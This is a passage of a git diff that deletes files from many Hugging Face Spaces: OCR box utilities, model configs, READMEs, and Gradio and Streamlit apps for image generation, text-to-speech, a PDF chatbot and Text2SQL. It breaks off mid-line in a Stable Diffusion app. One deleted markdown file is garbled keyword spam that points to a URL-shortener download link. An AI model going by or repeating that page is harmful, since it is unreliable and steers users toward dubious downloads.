lines.append([]) - lines[line_idx].append(line[k]) - - # Get merged boxes - for box_group in lines: - merged_box = {} - merged_box['text'] = ' '.join( - [x_sorted_boxes[idx]['text'] for idx in box_group]) - x_min, y_min = float('inf'), float('inf') - x_max, y_max = float('-inf'), float('-inf') - for idx in box_group: - x_max = max(np.max(x_sorted_boxes[idx]['box'][::2]), x_max) - x_min = min(np.min(x_sorted_boxes[idx]['box'][::2]), x_min) - y_max = max(np.max(x_sorted_boxes[idx]['box'][1::2]), y_max) - y_min = min(np.min(x_sorted_boxes[idx]['box'][1::2]), y_min) - merged_box['box'] = [ - x_min, y_min, x_max, y_min, x_max, y_max, x_min, y_max - ] - merged_boxes.append(merged_box) - - return merged_boxes - - -def bezier_to_polygon(bezier_points, num_sample=20): - """Sample points from the boundary of a polygon enclosed by two Bezier - curves, which are controlled by ``bezier_points``. - - Args: - bezier_points (ndarray): A :math:`(2, 4, 2)` array of 8 Bezeir points - or its equalivance. The first 4 points control the curve at one - side and the last four control the other side. - num_sample (int): The number of sample points at each Bezeir curve. - - Returns: - list[ndarray]: A list of 2*num_sample points representing the polygon - extracted from Bezier curves. - - Warning: - The points are not guaranteed to be ordered. Please use - :func:`mmocr.utils.sort_points` to sort points if necessary. - """ - assert num_sample > 0 - - bezier_points = np.asarray(bezier_points) - assert np.prod( - bezier_points.shape) == 16, 'Need 8 Bezier control points to continue!' - - bezier = bezier_points.reshape(2, 4, 2).transpose(0, 2, 1).reshape(4, 4) - u = np.linspace(0, 1, num_sample) - - points = np.outer((1 - u) ** 3, bezier[:, 0]) \ - + np.outer(3 * u * ((1 - u) ** 2), bezier[:, 1]) \ - + np.outer(3 * (u ** 2) * (1 - u), bezier[:, 2]) \ - + np.outer(u ** 3, bezier[:, 3]) - - # Convert points to polygon - points = np.concatenate((points[:, :2], points[:, 2:]), axis=0) - return points.tolist() - - -def sort_points(points): - """Sort arbitory points in clockwise order. Reference: - https://stackoverflow.com/a/6989383. - - Args: - points (list[ndarray] or ndarray or list[list]): A list of unsorted - boundary points. - - Returns: - list[ndarray]: A list of points sorted in clockwise order. - """ - - assert is_type_list(points, np.ndarray) or isinstance(points, np.ndarray) \ - or is_2dlist(points) - - points = np.array(points) - center = np.mean(points, axis=0) - - def cmp(a, b): - oa = a - center - ob = b - center - - # Some corner cases - if oa[0] >= 0 and ob[0] < 0: - return 1 - if oa[0] < 0 and ob[0] >= 0: - return -1 - - prod = np.cross(oa, ob) - if prod > 0: - return 1 - if prod < 0: - return -1 - - # a, b are on the same line from the center - return 1 if (oa**2).sum() < (ob**2).sum() else -1 - - return sorted(points, key=functools.cmp_to_key(cmp)) diff --git a/spaces/tomofi/NDLOCR/src/ndl_layout/mmdetection/configs/dcn/mask_rcnn_r50_fpn_mdconv_c3-c5_1x_coco.py b/spaces/tomofi/NDLOCR/src/ndl_layout/mmdetection/configs/dcn/mask_rcnn_r50_fpn_mdconv_c3-c5_1x_coco.py deleted file mode 100644 index 5ca2a67cde62bff078b7c4c0d696a585265e4c3a..0000000000000000000000000000000000000000 --- a/spaces/tomofi/NDLOCR/src/ndl_layout/mmdetection/configs/dcn/mask_rcnn_r50_fpn_mdconv_c3-c5_1x_coco.py +++ /dev/null @@ -1,5 +0,0 @@ -_base_ = '../mask_rcnn/mask_rcnn_r50_fpn_1x_coco.py' -model = dict( - backbone=dict( - dcn=dict(type='DCNv2', deform_groups=1, fallback_on_stride=False), - stage_with_dcn=(False, True, True, True))) diff --git a/spaces/tracinginsights/F1-analysis/README.md b/spaces/tracinginsights/F1-analysis/README.md deleted file mode 100644 index 2833a9ee033c442fd97a6e910f77849988cb0732..0000000000000000000000000000000000000000 --- a/spaces/tracinginsights/F1-analysis/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: F1 Analysis - Tracing Insights -emoji: 🌖 -colorFrom: lime -colorTo: green -sdk: streamlit -sdk_version: 1.10.0 -app_file: app.py -fullWidth: true -pinned: true -license: other ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/triggah61/chingu-music/CONTRIBUTING.md b/spaces/triggah61/chingu-music/CONTRIBUTING.md deleted file mode 100644 index 55b99140204d785d572ada9761dd77f302ae31c6..0000000000000000000000000000000000000000 --- a/spaces/triggah61/chingu-music/CONTRIBUTING.md +++ /dev/null @@ -1,35 +0,0 @@ -# Contributing to Audiocraft - -We want to make contributing to this project as easy and transparent as -possible. - -## Pull Requests - -Audiocraft is the implementation of a research paper. -Therefore, we do not plan on accepting many pull requests for new features. -We certainly welcome them for bug fixes. - -1. Fork the repo and create your branch from `main`. -2. If you've added code that should be tested, add tests. -3. If you've changed APIs, update the documentation. -4. Ensure the test suite passes. -5. Make sure your code lints. -6. If you haven't already, complete the Contributor License Agreement ("CLA"). - -## Contributor License Agreement ("CLA") -In order to accept your pull request, we need you to submit a CLA. You only need -to do this once to work on any of Meta's open source projects. - -Complete your CLA here: - -## Issues -We use GitHub issues to track public bugs. Please ensure your description is -clear and has sufficient instructions to be able to reproduce the issue. - -Meta has a [bounty program](https://www.facebook.com/whitehat/) for the safe -disclosure of security bugs. In those cases, please go through the process -outlined on that page and do not file a public issue. - -## License -By contributing to encodec, you agree that your contributions will be licensed -under the LICENSE file in the root directory of this source tree. diff --git a/spaces/trysem/nuclearfu/app.py b/spaces/trysem/nuclearfu/app.py deleted file mode 100644 index ea98a02e08d7675b67e632c91e6015c26f8a722d..0000000000000000000000000000000000000000 --- a/spaces/trysem/nuclearfu/app.py +++ /dev/null @@ -1,109 +0,0 @@ -import gradio as gr -import os -import sys -from pathlib import Path -import random -import string -import time -from queue import Queue -from threading import Thread - -text_gen=gr.Interface.load("spaces/trysem/visua") -def get_prompts(prompt_text): - return text_gen(prompt_text) -proc1=gr.Interface.load("models/dreamlike-art/dreamlike-photoreal-2.0") - -def restart_script_periodically(): - while True: - time.sleep(600) # 10 minutes - try: - os.execl(sys.executable, sys.executable, *sys.argv) - except: - pass - -restart_thread = Thread(target=restart_script_periodically, daemon=True) -restart_thread.start() - -queue = Queue() -queue_threshold = 800 - -def add_random_noise(prompt, noise_level=0.07): - if noise_level == 0: - noise_level = 0.07 - # Get the percentage of characters to add as noise - percentage_noise = noise_level * 5 - # Get the number of characters to add as noise - num_noise_chars = int(len(prompt) * (percentage_noise/100)) - # Get the indices of the characters to add noise to - noise_indices = random.sample(range(len(prompt)), num_noise_chars) - # Add noise to the selected characters - prompt_list = list(prompt) - noise_chars = string.ascii_letters + string.punctuation + ' ' - for index in noise_indices: - prompt_list[index] = random.choice(noise_chars) - return "".join(prompt_list) - - -def send_it1(inputs, noise_level, proc1=proc1): - prompt_with_noise = add_random_noise(inputs, noise_level) - output1 = proc1(prompt_with_noise) - return output1 - -def send_it2(inputs, noise_level, proc1=proc1): - prompt_with_noise = add_random_noise(inputs, noise_level) - output2 = proc1(prompt_with_noise) - return output2 - -def send_it3(inputs, noise_level, proc1=proc1): - prompt_with_noise = add_random_noise(inputs, noise_level) - output3 = proc1(prompt_with_noise) - return output3 - -#def send_it4(inputs, noise_level, proc1=proc1): - #prompt_with_noise = add_random_noise(inputs, noise_level) - #output4 = proc1(prompt_with_noise) - #return output4 - - - - -with gr.Blocks(css="footer {visibility: hidden}") as myface: - with gr.Row(): - - input_text=gr.Textbox(label="Short Prompt") - see_prompts=gr.Button("Magic Prompt") - with gr.Row(): - - prompt=gr.Textbox(label="Enter Prompt") - noise_level=gr.Slider(minimum=0.0, maximum=3, step=0.1, label="Noise Level: Controls how much randomness is added to the input before it is sent to the model. Higher noise level produces more diverse outputs, while lower noise level produces similar outputs.") - run=gr.Button("Generate") - - with gr.Row(): - like_message = gr.Button("❤️❤️❤️ Press the Like Button if you enjoy my space! ❤️❤️❤️") - - - with gr.Row(): - output1=gr.Image(label="Dreamlike-photoreal-2.0") - output2=gr.Image(label="Dreamlike-photoreal-2.0") - output3=gr.Image(label="Dreamlike-photoreal-2.0") - #output4=gr.Image(label="Dreamlike-photoreal-2.0") - #with gr.Row(): - #output5=gr.Image(label="Dreamlike-photoreal-2.0") - #output6=gr.Image(label="Dreamlike-photoreal-2.0") - #with gr.Row(): - #output7=gr.Image(label="Dreamlike-photoreal-2.0") - #output8=gr.Image(label="Dreamlike-photoreal-2.0") - - see_prompts.click(get_prompts, inputs=[input_text], outputs=[prompt], queue=False) - run.click(send_it1, inputs=[prompt, noise_level], outputs=[output1]) - run.click(send_it2, inputs=[prompt, noise_level], outputs=[output2]) - run.click(send_it3, inputs=[prompt, noise_level], outputs=[output3]) - #run.click(send_it4, inputs=[prompt, noise_level], outputs=[output4]) - #run.click(send_it5, inputs=[prompt, noise_level], outputs=[output5]) - #run.click(send_it6, inputs=[prompt, noise_level], outputs=[output6]) - #run.click(send_it7, inputs=[prompt, noise_level], outputs=[output7]) - #run.click(send_it8, inputs=[prompt, noise_level], outputs=[output8]) - - -myface.launch(enable_queue=True, inline=True) -block.queue(concurrency_count=100) \ No newline at end of file diff --git a/spaces/typesdigital/TwitterPRO/README.md b/spaces/typesdigital/TwitterPRO/README.md deleted file mode 100644 index a0ecf10d0e5e22889f1fd30a2990c3be3d5675ad..0000000000000000000000000000000000000000 --- a/spaces/typesdigital/TwitterPRO/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: TwitterPRO -emoji: 🐢 -colorFrom: gray -colorTo: blue -sdk: gradio -sdk_version: 3.27.0 -app_file: app.py -pinned: false -license: afl-3.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/usbethFlerru/sovits-modelsV2/example/Benimadhabshilpanjikapdfdownload [PORTABLE].md b/spaces/usbethFlerru/sovits-modelsV2/example/Benimadhabshilpanjikapdfdownload [PORTABLE].md deleted file mode 100644 index 815ad4d069e4924e8134d8f93e4145db1bdecf1d..0000000000000000000000000000000000000000 --- a/spaces/usbethFlerru/sovits-modelsV2/example/Benimadhabshilpanjikapdfdownload [PORTABLE].md +++ /dev/null @@ -1,6 +0,0 @@ - -

    benimadhabshilpanjikapdfdownload.F.A.Q. u.a.hdfs2Stunnel: "Wenn Sie die Server lokal angefahren werden (Optionen Optionen aus browser bzw.programm).benimadhabshilpanjikapdfdownload.. o-gyokuro" erweitert bahnbetreiben, kann das gemacht für die von den opls. Whether my download is corrupted or not, you can access the file on my web server through my FTP server.

    -

    benimadhabshilpanjikapdfdownload


    DOWNLOAD ––– https://urlcod.com/2uyVkv



    -

    benimadhabshilpanjikapdfdownload.. benimadhabshilpanjikapdfdownload.. benimadhabshilpanjikapdfdownload. 4 000 megabyte der Versionen 10.6 und 10.7 ist die mit dem Windows 7-Release-2 versionsteilung.. benimadhabshilpanjikapdfdownload. Apr 24, 2013. 1) wie lange lesen sie? benimadhabshilpanjikapdfdownload... benimadhabshilpanjikapdfdownload. 2 - benimadhabshilpanjikapdfdownload.Benimadhabshilpanjikapdfdownload - benimadhabshilpanjikapdfdownload. URL: http://www.benimadhabshilpanjikapdfdownload. 3) gewährleistet die integrierte Kopfhaut? benimadhabshilpanjikapdfdownload. For example, an uploaded file can be downloaded to any directory that you tell FileZilla to put files in.. Benimadhabshilpanjikapdfdownload - benimadhabshilpanjikapdfdownload.URL: https://drive.google.com/open?id=19YlX_aEeGAqJtqSjdXRU3ut3BwUkEx7. benimadhabshilpanjikapdfdownload.Product Details.. benimadhabshilpanjikapdfdownload.. benimadhabshilpanjikapdfdownload.. benimadhabshilpanjikapdfdownload. 2,. auf die Daten und Ordner auf dem Arbeitstisch, der auch als Aktivierung.benimadhabshilpanjikapdfdownload. 311274 www.benimadhabshilpanjikapdfdownload.Com benimadhabshilpanjikapdfdownload - benimadhabshilpanjikapdfdownload. URL: http://www.benimadhabshilpanjikapdfdownload.Good/bad/ugly-pdf-benimadhabshilpanjikapdfdownload.

    899543212b
    -
    -
    \ No newline at end of file diff --git a/spaces/utec/SpaceKonnor-tts_transformer-es-css10/app.py b/spaces/utec/SpaceKonnor-tts_transformer-es-css10/app.py deleted file mode 100644 index 2973cdc5fa7bbed8a322d98adc3b76b3fa658875..0000000000000000000000000000000000000000 --- a/spaces/utec/SpaceKonnor-tts_transformer-es-css10/app.py +++ /dev/null @@ -1,5 +0,0 @@ -import gradio as gr - -examples = [["No se que escribir aqui"], ["Esto es un ejemplo, Hola"]] - -gr.Interface.load("huggingface/facebook/tts_transformer-es-css10", title="TTS Tranformer", examples=examples).launch(); \ No newline at end of file diff --git a/spaces/uzairm/anyroad/app.py b/spaces/uzairm/anyroad/app.py deleted file mode 100644 index 30c4b97aa48c34b9ff9428472f601548d46cb2d9..0000000000000000000000000000000000000000 --- a/spaces/uzairm/anyroad/app.py +++ /dev/null @@ -1,64 +0,0 @@ -from dotenv import load_dotenv -import time -from fastapi import FastAPI, HTTPException -import gradio as gr -import os - -from langchain.chains import ConversationalRetrievalChain -from langchain.text_splitter import CharacterTextSplitter -from langchain.embeddings import OpenAIEmbeddings -from langchain.vectorstores import Chroma -from langchain.chat_models import ChatOpenAI -from langchain.document_loaders import PyPDFLoader -from langchain.memory import ConversationBufferMemory - - -app = FastAPI() - -# Load environment variables -load_dotenv(".env") - -documents = [] -for file in os.listdir('docs'): - if file.endswith('.pdf'): - pdf_path = './docs/' + file - loader = PyPDFLoader(pdf_path) - documents.extend(loader.load()) - -text_splitter = CharacterTextSplitter(chunk_size=600, chunk_overlap=0) -texts = text_splitter.split_documents(documents) - -# Select which embeddings to use -embeddings = OpenAIEmbeddings() - -# Create the vector store to use as the index -db = Chroma.from_documents(texts, embeddings) - -# Expose this index in a retriever interface -retriever = db.as_retriever(search_type="mmr", search_kwargs={"k": 4}) - -# Create a chain to answer questions -memory = ConversationBufferMemory(memory_key="chat_history", return_messages=True) -qa = ConversationalRetrievalChain.from_llm( - ChatOpenAI(), retriever=retriever, memory=memory -) - - -async def ask_question(question, history): - try: - # Your code to answer questions - result = qa({"question": question, "chat_history": history}) - time.sleep(1) - return result["answer"] - except Exception: - raise HTTPException(status_code=500, detail="Internal Server Error") - - -# Create a Gradio interface for conversation -gr.ChatInterface( - ask_question, - title="AnyRoad Inc.", - description="ChatBot for AnyRoad", - theme="soft", - submit_btn="Send", -).launch() diff --git a/spaces/vaishanthr/Simultaneous-Segmented-Depth-Prediction/yolov8/docs/reference/tracker/track.md b/spaces/vaishanthr/Simultaneous-Segmented-Depth-Prediction/yolov8/docs/reference/tracker/track.md deleted file mode 100644 index 88db7f264fe2ceba31ec703fb53e8a4dd3dbe46c..0000000000000000000000000000000000000000 --- a/spaces/vaishanthr/Simultaneous-Segmented-Depth-Prediction/yolov8/docs/reference/tracker/track.md +++ /dev/null @@ -1,19 +0,0 @@ ---- -description: Learn how to register custom event-tracking and track predictions with Ultralytics YOLO via on_predict_start and register_tracker methods. -keywords: Ultralytics YOLO, tracker registration, on_predict_start, object detection ---- - -## on_predict_start ---- -### ::: ultralytics.tracker.track.on_predict_start -

    - -## on_predict_postprocess_end ---- -### ::: ultralytics.tracker.track.on_predict_postprocess_end -

    - -## register_tracker ---- -### ::: ultralytics.tracker.track.register_tracker -

    diff --git a/spaces/vbzvibin/Text2SQL/app.py b/spaces/vbzvibin/Text2SQL/app.py deleted file mode 100644 index a75907ce797718590ecc1149765c1bfc53ed287d..0000000000000000000000000000000000000000 --- a/spaces/vbzvibin/Text2SQL/app.py +++ /dev/null @@ -1,178 +0,0 @@ -# -*- coding: utf-8 -*- -""" -Created on Fri May 26 14:07:22 2023 - -@author: vibin -""" - -import streamlit as st -from pandasql import sqldf -import pandas as pd -import re -from typing import List -from transformers import AutoTokenizer, AutoModelForSeq2SeqLM, pipeline -import re - - -@st.cache_resource() -def tapas_model(): - return(pipeline(task="table-question-answering", model="google/tapas-base-finetuned-wtq")) - -@st.cache_resource() -def prepare_input(question: str, table: List[str]): - table_prefix = "table:" - question_prefix = "question:" - join_table = ",".join(table) - inputs = f"{question_prefix} {question} {table_prefix} {join_table}" - input_ids = tokenizer(inputs, max_length=512, return_tensors="pt").input_ids - return input_ids - -@st.cache_resource() -def inference(question: str, table: List[str]) -> str: - input_data = prepare_input(question=question, table=table) - input_data = input_data.to(model.device) - outputs = model.generate(inputs=input_data, num_beams=10, top_k=10, max_length=700) - result = tokenizer.decode(token_ids=outputs[0], skip_special_tokens=True) - return result - -@st.cache_resource() -def tokmod(tok_md): - tkn = AutoTokenizer.from_pretrained(tok_md) - mdl = AutoModelForSeq2SeqLM.from_pretrained(tok_md) - return(tkn,mdl) - - -### Main - -nav = st.sidebar.radio("Navigation",["TAPAS","Text2SQL"]) -if nav == "TAPAS": - - col1 , col2, col3 = st.columns(3) - col2.title("TAPAS") - - col3 , col4 = st.columns([3,12]) - col4.text("Tabular Data Text Extraction using text") - - table = pd.read_csv("data.csv") - table = table.astype(str) - st.text("DataSet - ") - st.dataframe(table,width=3000,height= 400) - - st.title("") - - lst_q = ["Which country has low medicare","Who are the patients from india","Who are the patients from india","Patients who have Edema","CUI code for diabetes patients","Patients having oxygen less than 94 but 91"] - - v2 = st.selectbox("Choose your text",lst_q,index = 0) - - st.title("") - - sql_txt = st.text_area("TAPAS Input",v2) - - if st.button("Predict"): - tqa = tapas_model() - txt_sql = tqa(table=table, query=sql_txt)["answer"] - st.text("Output - ") - st.success(f"{txt_sql}") - # st.write(all_students) - - - -elif nav == "Text2SQL": - - ### Function - col1 , col2, col3 = st.columns(3) - col2.title("Text2SQL") - - col3 , col4 = st.columns([1,20]) - col4.text("Text will be converted to SQL Query and can extract the data from DataSet") - - # Import Data - - #df_qna = pd.read_csv("qnacsv.csv", encoding= 'unicode_escape') - df_qna = pd.read_csv("data.csv") - st.title("") - - st.text("DataSet - ") - st.dataframe(df_qna,width=3000,height= 500) - - st.title("") - - lst_q = ["what interface is measure indicator code = 72_HR_ABX and version is 1 and source is TD", "get class code with measure = 72_HR_ABX", "get sum of version for Class_Code is Antibiotic Stewardship", "what interface is measure indicator code = 72_HR_ABX"] - v2 = st.selectbox("Choose your text",lst_q,index = 0) - - st.title("") - - - sql_txt = st.text_area("Text for SQL Conversion",v2) - - - if st.button("Predict"): - - tok_model = "juierror/flan-t5-text2sql-with-schema" - tokenizer,model = tokmod(tok_model) - - # text = "what interface is measure indicator code = 72_HR_ABX and version is 1 and source is TD" - table_name = "df_qna" - table_column = ['Patient_Name', 'Country', 'Disease', 'CUI', 'Snomed', 'Oxygen_Rate','Med_Type', 'Admission_Date'] - - txt_sql = inference(question=sql_txt, table=table_column) - - - ### SQL Modification - sql_avg = ["AVG","COUNT","DISTINCT","MAX","MIN","SUM"] - txt_sql = txt_sql.replace("table",table_name) - sql_quotes = [] - for match in re.finditer("=",txt_sql): - new_txt = txt_sql[match.span()[1]+1:] - try: - match2 = re.search("AND",new_txt) - sql_quotes.append((new_txt[:match2.span()[0]]).strip()) - except: - sql_quotes.append(new_txt.strip()) - - for i in sql_quotes: - qts = "'" + i + "'" - txt_sql = txt_sql.replace(i, qts) - - for r in sql_avg: - if r in txt_sql: - rr = re.search(rf"{r} (\w+)", txt_sql) - init = " " + rr[1] - qts = "(" + rr[1] + ")" - txt_sql = txt_sql.replace(init,qts) - else: - pass - - - st.success(f"{txt_sql}") - all_students = sqldf(txt_sql) - - st.text("Output - ") - st.write(all_students) - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/spaces/vinthony/SadTalker/src/face3d/models/arcface_torch/configs/ms1mv3_r2060.py b/spaces/vinthony/SadTalker/src/face3d/models/arcface_torch/configs/ms1mv3_r2060.py deleted file mode 100644 index 23ad81e082c4b6390b67b164d0ceb84bb0635684..0000000000000000000000000000000000000000 --- a/spaces/vinthony/SadTalker/src/face3d/models/arcface_torch/configs/ms1mv3_r2060.py +++ /dev/null @@ -1,26 +0,0 @@ -from easydict import EasyDict as edict - -# make training faster -# our RAM is 256G -# mount -t tmpfs -o size=140G tmpfs /train_tmp - -config = edict() -config.loss = "arcface" -config.network = "r2060" -config.resume = False -config.output = None -config.embedding_size = 512 -config.sample_rate = 1.0 -config.fp16 = True -config.momentum = 0.9 -config.weight_decay = 5e-4 -config.batch_size = 64 -config.lr = 0.1 # batch size is 512 - -config.rec = "/train_tmp/ms1m-retinaface-t1" -config.num_classes = 93431 -config.num_image = 5179510 -config.num_epoch = 25 -config.warmup_epoch = -1 -config.decay_epoch = [10, 16, 22] -config.val_targets = ["lfw", "cfp_fp", "agedb_30"] diff --git a/spaces/visakh7843/Sheet_Music_Generator/markov.py b/spaces/visakh7843/Sheet_Music_Generator/markov.py deleted file mode 100644 index b4c9b4ac9a2ac3f7dfc52b1a3634f2be796d4d30..0000000000000000000000000000000000000000 --- a/spaces/visakh7843/Sheet_Music_Generator/markov.py +++ /dev/null @@ -1,127 +0,0 @@ -# based on markov.py by Allison Parish -# https://github.com/aparrish/rwet-examples/blob/master/ngrams/markov.py - -import random - -def build_model(tokens, n): - "Builds a Markov model from the list of tokens, using n-grams of length n." - model = dict() - if len(tokens) < n: - return model - for i in range(len(tokens) - n): - gram = tuple(tokens[i:i+n]) - next_token = tokens[i+n] - if gram in model: - model[gram].append(next_token) - else: - model[gram] = [next_token] - final_gram = tuple(tokens[len(tokens)-n:]) - # if final_gram in model: - # model[final_gram].append(None) - # else: - # model[final_gram] = [None] - return model - -def generate(model, n, seed=None, max_iterations=100): - """Generates a list of tokens from information in model, using n as the - length of n-grams in the model. Starts the generation with the n-gram - given as seed. If more than max_iteration iterations are reached, the - process is stopped. (This is to prevent infinite loops)""" - if seed is None: - seed = random.choice(list(model.keys())) - else: - seed = (seed,) - output = list(seed) - current = tuple(seed) - for i in range(max_iterations): - if current in model: - possible_next_tokens = model[current] - next_token = random.choice(possible_next_tokens) - if next_token is None: - print('next token is none') - break - output.append(next_token) - current = tuple(output[-n:]) - else: - break - # print 'output: ' + output[1] - return output - -def merge_models(models): - "Merges two or more Markov models." - merged_model = dict() - for model in models: - for key, val in model.items(): - if key in merged_model: - merged_model[key].extend(val) - else: - merged_model[key] = val - return merged_model - -def generate_from_token_lists(token_lines, n, count=14, max_iterations=100): - """Generates text from a list of lists of tokens. This function is intended - for input text where each line forms a distinct unit (e.g., poetry), and - where the desired output is to recreate lines in that form. It does this - by keeping track of the n-gram that comes at the beginning of each line, - and then only generating lines that begin with one of these "beginnings." - It also builds a separate Markov model for each line, and then merges - those models together, to ensure that lines end with n-grams statistically - likely to end lines in the original text.""" - beginnings = list() - models = list() - for token_line in token_lines: - beginning = token_line[:n] - beginnings.append(beginning) - line_model = build_model(token_line, n) - models.append(line_model) - combined_model = merge_models(models) - generated_list = list() - for i in range(count): - generated_str = generate(combined_model, n, random.choice(beginnings), - max_iterations) - generated_list.append(generated_str) - return generated_list - -# def char_level_generate(lines, n, count=14, max_iterations=100): -# """Generates Markov chain text from the given lines, using character-level -# n-grams of length n. Returns a list of count items.""" -# token_lines = [list(line) for line in lines] -# generated = generate_from_token_lists(token_lines, n, count, max_iterations) -# return [''.join(item) for item in generated] - -# def word_level_generate(lines, n, count=14, max_iterations=100): -# """Generates Markov chain text from the given lines, using word-level -# n-grams of length n. Returns a list of count items.""" -# token_lines = [line.split() for line in lines] -# generated = generate_from_token_lists(token_lines, n, count, max_iterations) -# return [' '.join(item) for item in generated] - -def generate_model_from_token_lists(token_lines, n, count=14, max_iterations=100): - """Generates text from a list of lists of tokens. This function is intended - for input text where each line forms a distinct unit (e.g., poetry), and - where the desired output is to recreate lines in that form. It does this - by keeping track of the n-gram that comes at the beginning of each line, - and then only generating lines that begin with one of these "beginnings." - It also builds a separate Markov model for each line, and then merges - those models together, to ensure that lines end with n-grams statistically - likely to end lines in the original text.""" - # beginnings = list() - models = list() - for token_line in token_lines: - # beginning = token_line[:n] - # beginnings.append(beginning) - line_model = build_model(token_line, n) - models.append(line_model) - combined_model = merge_models(models) - return combined_model - - -# if __name__ == '__main__': -# import sys -# n = int(sys.argv[1]) -# lines = list() -# for line in sys.stdin: -# line = line.strip() -# lines.append(line) -# for generated in char_level_generate(lines, n): -# print(generated) \ No newline at end of file diff --git a/spaces/vonbarnekowa/stable-diffusion/app.py b/spaces/vonbarnekowa/stable-diffusion/app.py deleted file mode 100644 index a0ee891be2cd5b3104da77cdc491a0ceddc1807b..0000000000000000000000000000000000000000 --- a/spaces/vonbarnekowa/stable-diffusion/app.py +++ /dev/null @@ -1,593 +0,0 @@ -import gradio as gr -import argparse, os -import cv2 -import torch -import numpy as np -from omegaconf import OmegaConf -from PIL import Image -from tqdm import tqdm, trange -from itertools import islice -from einops import rearrange -from torchvision.utils import make_grid -from pytorch_lightning import seed_everything -from torch import autocast -from contextlib import nullcontext -from imwatermark import WatermarkEncoder -import re - -from ldm.util import instantiate_from_config -from ldm.models.diffusion.ddim import DDIMSampler -from ldm.models.diffusion.plms import PLMSSampler -from ldm.models.diffusion.dpm_solver import DPMSolverSampler -from huggingface_hub import hf_hub_download -from datasets import load_dataset - -torch.set_grad_enabled(False) - -from share_btn import community_icon_html, loading_icon_html, share_js - -REPO_ID = "stabilityai/stable-diffusion-2" -CKPT_NAME = "768-v-ema.ckpt" -CONFIG_PATH = "./configs/stable-diffusion/v2-inference-v.yaml" -device = "cuda" -stable_diffusion_2_path = hf_hub_download(repo_id=REPO_ID, filename=CKPT_NAME) - -torch.set_grad_enabled(False) - -def chunk(it, size): - it = iter(it) - return iter(lambda: tuple(islice(it, size)), ()) - - -def load_model_from_config(config, ckpt, verbose=False): - print(f"Loading model from {ckpt}") - pl_sd = torch.load(ckpt, map_location="cpu") - if "global_step" in pl_sd: - print(f"Global Step: {pl_sd['global_step']}") - sd = pl_sd["state_dict"] - model = instantiate_from_config(config.model) - m, u = model.load_state_dict(sd, strict=False) - if len(m) > 0 and verbose: - print("missing keys:") - print(m) - if len(u) > 0 and verbose: - print("unexpected keys:") - print(u) - - model.cuda() - model.eval() - return model - -def put_watermark(img, wm_encoder=None): - if wm_encoder is not None: - img = cv2.cvtColor(np.array(img), cv2.COLOR_RGB2BGR) - img = wm_encoder.encode(img, 'dwtDct') - img = Image.fromarray(img[:, :, ::-1]) - return img - -#When running locally, you won`t have access to this, so you can remove this part -word_list_dataset = load_dataset("stabilityai/word-list", data_files="list.txt", use_auth_token=True) -word_list = word_list_dataset["train"]['text'] - -config = OmegaConf.load(CONFIG_PATH) -model = load_model_from_config(config, stable_diffusion_2_path) -device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu") -model = model.to(device) - -def parse_args(): - parser = argparse.ArgumentParser() - parser.add_argument( - "--prompt", - type=str, - nargs="?", - default="a professional photograph of an astronaut riding a triceratops", - help="the prompt to render" - ) - parser.add_argument( - "--outdir", - type=str, - nargs="?", - help="dir to write results to", - default="outputs/txt2img-samples" - ) - parser.add_argument( - "--steps", - type=int, - default=50, - help="number of ddim sampling steps", - ) - parser.add_argument( - "--plms", - action='store_true', - help="use plms sampling", - ) - parser.add_argument( - "--dpm", - action='store_true', - help="use DPM (2) sampler", - ) - parser.add_argument( - "--fixed_code", - action='store_true', - help="if enabled, uses the same starting code across all samples ", - ) - parser.add_argument( - "--ddim_eta", - type=float, - default=0.0, - help="ddim eta (eta=0.0 corresponds to deterministic sampling", - ) - parser.add_argument( - "--n_iter", - type=int, - default=3, - help="sample this often", - ) - parser.add_argument( - "--H", - type=int, - default=512, - help="image height, in pixel space", - ) - parser.add_argument( - "--W", - type=int, - default=512, - help="image width, in pixel space", - ) - parser.add_argument( - "--C", - type=int, - default=4, - help="latent channels", - ) - parser.add_argument( - "--f", - type=int, - default=8, - help="downsampling factor, most often 8 or 16", - ) - parser.add_argument( - "--n_samples", - type=int, - default=3, - help="how many samples to produce for each given prompt. A.k.a batch size", - ) - parser.add_argument( - "--n_rows", - type=int, - default=0, - help="rows in the grid (default: n_samples)", - ) - parser.add_argument( - "--scale", - type=float, - default=9.0, - help="unconditional guidance scale: eps = eps(x, empty) + scale * (eps(x, cond) - eps(x, empty))", - ) - parser.add_argument( - "--from-file", - type=str, - help="if specified, load prompts from this file, separated by newlines", - ) - parser.add_argument( - "--config", - type=str, - default="configs/stable-diffusion/v2-inference.yaml", - help="path to config which constructs model", - ) - parser.add_argument( - "--ckpt", - type=str, - help="path to checkpoint of model", - ) - parser.add_argument( - "--seed", - type=int, - default=42, - help="the seed (for reproducible sampling)", - ) - parser.add_argument( - "--precision", - type=str, - help="evaluate at this precision", - choices=["full", "autocast"], - default="autocast" - ) - parser.add_argument( - "--repeat", - type=int, - default=1, - help="repeat each prompt in file this often", - ) - opt = parser.parse_args() - return opt - -def infer(prompt, samples, steps, scale, seed): - opt = parse_args() - opt.seed = seed - seed_everything(seed) - - for filter in word_list: - if re.search(rf"\b{filter}\b", prompt): - raise gr.Error("Unsafe content found. Please try again with different prompts.") - - opt.n_samples = samples - opt.scale = scale - opt.prompt = prompt - opt.steps = steps - opt.n_iter = 1 - sampler = DPMSolverSampler(model) - os.makedirs(opt.outdir, exist_ok=True) - outpath = opt.outdir - - print("Creating invisible watermark encoder (see https://github.com/ShieldMnt/invisible-watermark)...") - wm = "SDV2" - wm_encoder = WatermarkEncoder() - wm_encoder.set_watermark('bytes', wm.encode('utf-8')) - - batch_size = opt.n_samples - n_rows = opt.n_rows if opt.n_rows > 0 else batch_size - if not opt.from_file: - prompt = opt.prompt - assert prompt is not None - data = [batch_size * [prompt]] - else: - print(f"reading prompts from {opt.from_file}") - with open(opt.from_file, "r") as f: - data = f.read().splitlines() - data = [p for p in data for i in range(opt.repeat)] - data = list(chunk(data, batch_size)) - prompt = prompt - assert prompt is not None - data = [batch_size * [prompt]] - - sample_path = os.path.join(outpath, "samples") - os.makedirs(sample_path, exist_ok=True) - sample_count = 0 - base_count = len(os.listdir(sample_path)) - grid_count = len(os.listdir(outpath)) - 1 - - opt.W 